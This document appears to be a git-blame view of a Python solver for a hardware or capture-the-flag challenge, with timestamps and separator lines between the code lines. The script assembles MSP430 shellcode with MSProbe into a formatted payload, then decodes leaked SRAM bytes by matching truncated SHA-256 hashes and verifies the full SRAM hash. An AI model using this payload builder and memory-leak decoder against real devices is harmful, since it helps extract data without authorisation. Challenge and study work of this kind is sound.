2023-01-09 09:54:47 +00:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
2023-01-18 01:10:31 +00:00
|
|
|
import re, os, sys
|
2023-01-09 09:54:47 +00:00
|
|
|
from hashlib import sha256
|
2023-03-16 04:57:47 +00:00
|
|
|
# This program uses an extended version of Swiftloke's brilliant MSProbe to assemble the payload
|
|
|
|
|
from MSProbe.assemble import asmMain
|
2023-01-09 09:54:47 +00:00
|
|
|
|
|
|
|
|
# match this many hexadigits
|
|
|
|
|
# must be corroborated within the script
|
|
|
|
|
depth = 6
|
|
|
|
|
# bytes per message
|
|
|
|
|
message_size = 1
|
|
|
|
|
|
2023-01-18 01:10:31 +00:00
|
|
|
shellcode_asm = 'shellcode.asm'
|
|
|
|
|
if len(sys.argv) > 1:
|
|
|
|
|
shellcode_asm = sys.argv[1]
|
2023-01-09 09:54:47 +00:00
|
|
|
|
2023-01-18 01:10:31 +00:00
|
|
|
shellcode_out = f'{shellcode_asm}.tmp'
|
2023-01-09 09:54:47 +00:00
|
|
|
|
2023-03-16 04:57:47 +00:00
|
|
|
# Compile shellcode w/ msprobe
|
2023-01-18 01:10:31 +00:00
|
|
|
asmMain(shellcode_asm, shellcode_out, silent=True)
|
2023-01-09 09:54:47 +00:00
|
|
|
|
2023-03-16 04:57:47 +00:00
|
|
|
# Read compiled output
|
2023-01-18 01:10:31 +00:00
|
|
|
with open(shellcode_out) as file:
|
|
|
|
|
shellcode = file.readline()
|
|
|
|
|
os.remove(shellcode_out)
|
2023-03-16 04:57:47 +00:00
|
|
|
shellcode_len = len(bytes.fromhex(shellcode));
|
2023-01-09 09:54:47 +00:00
|
|
|
|
2023-03-16 04:57:47 +00:00
|
|
|
# Print formatted payload as hex
|
2023-01-18 01:10:31 +00:00
|
|
|
print(f"6000{shellcode_len:x}{shellcode}")
|
|
|
|
|
|
|
|
|
|
def main():
|
|
|
|
|
internal_sram_hash = input("Internal SRAM Hash: ").lower()
|
|
|
|
|
|
|
|
|
|
target = re.sub(r'\s+', '', input("\nEncoded Target: ")).lower()
|
|
|
|
|
|
|
|
|
|
# calculate LUT for given parameters
|
|
|
|
|
all_hashes = {}
|
|
|
|
|
for i in range (0, 1<<(8*message_size)):
|
|
|
|
|
key = sha256(i.to_bytes(length=message_size, byteorder='big', signed=False)).hexdigest()[:depth]
|
|
|
|
|
all_hashes[key] = i
|
|
|
|
|
dedup = list(dict.fromkeys(all_hashes.keys()))
|
|
|
|
|
#print(f"distinct values in all_hashes: {len(dedup)}\n")
|
|
|
|
|
|
|
|
|
|
sram: bytearray = bytearray()
|
|
|
|
|
|
|
|
|
|
# decode
|
|
|
|
|
print("Decoded:")
|
|
|
|
|
for loc in range (0, len(target), depth*message_size):
|
|
|
|
|
key = target[loc:loc+depth]
|
|
|
|
|
try:
|
|
|
|
|
value = all_hashes[key]
|
2023-07-05 00:23:11 +00:00
|
|
|
print(f"{value:02x}", end="")
|
2023-01-09 09:54:47 +00:00
|
|
|
|
2023-01-18 01:10:31 +00:00
|
|
|
except KeyError:
|
|
|
|
|
value = 0x00
|
|
|
|
|
sram.append(value)
|
|
|
|
|
|
|
|
|
|
# write to file
|
|
|
|
|
with open("carfax.bin", 'wb') as output:
|
|
|
|
|
output.write(sram)
|
2023-01-09 09:54:47 +00:00
|
|
|
|
2023-01-18 01:10:31 +00:00
|
|
|
print("")
|
|
|
|
|
# hexdump file
|
|
|
|
|
os.system("xxd carfax.bin")
|
2023-01-09 09:54:47 +00:00
|
|
|
|
2023-01-18 01:10:31 +00:00
|
|
|
# check hash against provided value
|
|
|
|
|
while len(sram) < 0x1000:
|
|
|
|
|
sram.append (0)
|
|
|
|
|
print (f"\nHash:\nProvided: {internal_sram_hash}\n Decoded: {sha256(sram).hexdigest()}")
|
2023-01-09 09:54:47 +00:00
|
|
|
|
2023-01-18 01:10:31 +00:00
|
|
|
if (sha256(sram).hexdigest().lower() == internal_sram_hash.lower()):
|
|
|
|
|
print("Hash match!")
|
2023-01-09 09:54:47 +00:00
|
|
|
|
2023-01-18 01:10:31 +00:00
|
|
|
if __name__ == "__main__":
|
|
|
|
|
main()
|
